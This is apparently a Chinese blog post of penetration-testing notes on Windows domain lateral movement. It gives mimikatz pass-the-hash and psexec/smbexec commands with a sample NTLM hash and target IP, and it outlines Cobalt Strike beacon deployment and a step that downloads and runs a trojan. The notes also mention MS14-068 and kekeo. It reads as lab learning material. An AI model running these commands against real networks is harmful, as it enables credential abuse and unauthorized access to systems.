内网安全-横向移动&PTH 哈希&PTT 票据&PTK 密匙&Kerberos&密码喷射

一.域横向pth,mimkatz,NTLM

windwos server 2012 R2之前可能是NTLM和LM,之后为NTLM

1.mimkatz ptk

使用mimkatz进行横向移动

mimikatz sekurlsa::pth /user:administrator(目标本地用户名) /domain:192.168.3.32(目标ip) /ntlm:518b98ad4178a53695dc997aa02d455c(目标hash)

在执行命令机器弹出cmd窗口

使用该命令进行传递木马

创建bshell:

执行:

在内网攻击机器进行hash传递

cs上配置socket节点

配置代理

使用psexec进行hash传递返回被控机器shell终端:

.\psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected]

上线cs:

1.上传木马到web目录

2.使用cmd下载木马并且执行

使用smbexec进行传递

.\smbexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected]

2.pth-漏洞&kekeo&Ticks

1.ms14068

2.kekeo(高权限,需要NTGM)

相关推荐
lswzw1 小时前
Ubuntu K8s集群安全加固方案
安全·ubuntu·kubernetes
CZIDC2 小时前
H3C Magic路由器安全警报来啦![特殊字符][特殊字符]
安全·智能路由器
远方2352 小时前
应用信息1.13.0发布
测试工具·安全·apk·开发工具·应用·工具·信息
鑫优威激光模组2 小时前
车载用激光模组在汽车激光雷达中的具体应用方式?
安全
苏生要努力2 小时前
VulnHub-DC-2靶机渗透教程
linux·安全
夜风Sec3 小时前
HTB - BigBang靶机记录
安全
不爱学习的YY酱4 小时前
LibrePhotos本地部署打造个人云相册安全存储和分享家庭照片(1)
安全·librephotos
CYRUS_STUDIO4 小时前
Android 加壳应用运行流程 与 生命周期类处理方案
android·安全·逆向
数信云 DCloud5 小时前
通付盾入选苏州市网络和数据安全免费体验目录,引领企业安全能力跃升
网络·安全
Sean_summer8 小时前
ctfhub-RCE
安全